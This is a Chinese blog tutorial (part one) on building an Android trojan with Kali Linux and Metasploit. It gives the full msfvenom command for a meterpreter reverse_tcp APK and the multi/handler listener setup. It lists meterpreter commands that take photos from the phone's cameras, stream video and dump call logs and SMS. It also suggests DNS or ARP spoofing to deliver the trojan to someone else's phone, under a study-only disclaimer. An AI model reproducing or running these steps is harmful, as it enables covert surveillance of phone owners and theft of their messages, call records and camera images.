kali linux使用msf入侵安卓手機(一)

文中提及的部分技術可能帶有一定攻擊性,僅供安全學習和教學用途,禁止非法使用

一、準備工作

將kali系統部署在虛擬機裏

設置虛擬機的目的是爲了不僅僅只有電腦和虛擬機互相連通,這樣設置的話,可以實現其他設備和虛擬機的互通,查詢是否連通輸入

ping IP

設置虛擬機

  1. 點擊虛擬機上方的 虛擬機 - 設置 - 網絡適配器 - 橋接模式:直接連接物理網絡
    在這裏插入圖片描述
  2. 點擊虛擬機上方的 編輯 - 虛擬網絡編輯器 - 更改設置 - 橋接模式 - 下拉選擇 - wifi或者本地連接(看你電腦系統是通過什麼連接的)
    在這裏插入圖片描述 在這裏插入圖片描述

二、正式操作

確保kali使用的是國內源
打開終端,安裝ufw防火牆,開啓5555端口

sudo apt-get install ufw
sudo ufw enable
sudo ufw allow 5555

接下來查詢一下本地IP,箭頭所指即爲虛擬機使用的IP:

sudo ifconfig

在這裏插入圖片描述
然後接下來生成安卓手機端的木馬:

msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.0.113 LPORT=5555 R > ~/123.apk

在這裏插入圖片描述
生成的木馬將會保存在 ~ 目錄
接下來啓動msfconsole,進行控制操作:

msfconsole

在這裏插入圖片描述
然後輸入以下命令,注意替換IP:

use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
set LHOST 192.168.0.113
set LPORT 5555
show options

在這裏插入圖片描述
這時候我們輸入 exploit 開始執行漏洞 開始監聽…
在這裏插入圖片描述
準備工作準備就緒,現在要做的就是把木馬文件搞到人家的手機上,思路有很多 可以DNS arp劫持欺騙 只要對方用手機下載文件,打開文件,我們就可以進行一些操作了。

強調一點:被侵入對象需要給我們的木馬文件一些權限,諸如訪問電話,信息,錄音,相機,手機存儲等權限。

只有拿到這些權限我們才能爲所欲爲。

由於我們是自我學習測試,我們手動給安裝上的木馬文件這些權限。安裝後的文件已Mainactivity的名字顯示在手機桌面上。點擊打開不會有任何操作,而此時我們的控制檯則返回用戶連接信息。

此時我們採集一下前置攝像頭的照片試試:webcam_snap -i 2 如果要採集後置攝像頭,只需將2改爲1即可。獲取手機攝像頭的代碼爲:webcam_list ,實時後置攝像頭代碼爲:webcam_stream
在這裏插入圖片描述
獲取通話記錄的代碼爲:dump_calllog,獲取的記錄會保存在 ~ 目錄下,獲取短信記錄的代碼爲:dump_sms在這裏插入圖片描述
在這裏插入圖片描述
注意一點:當有一會時間未及時操作便出現會連接超時,斷開,用戶需再次點擊木馬文件,你才能繼續操作。更多操作請自行挖掘哦。

強調一點:該教程只能用於學習,切勿用於違法行爲。若通過學習本篇博客,做出違法行爲,一切後果操作者自負。技術無罪。

發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章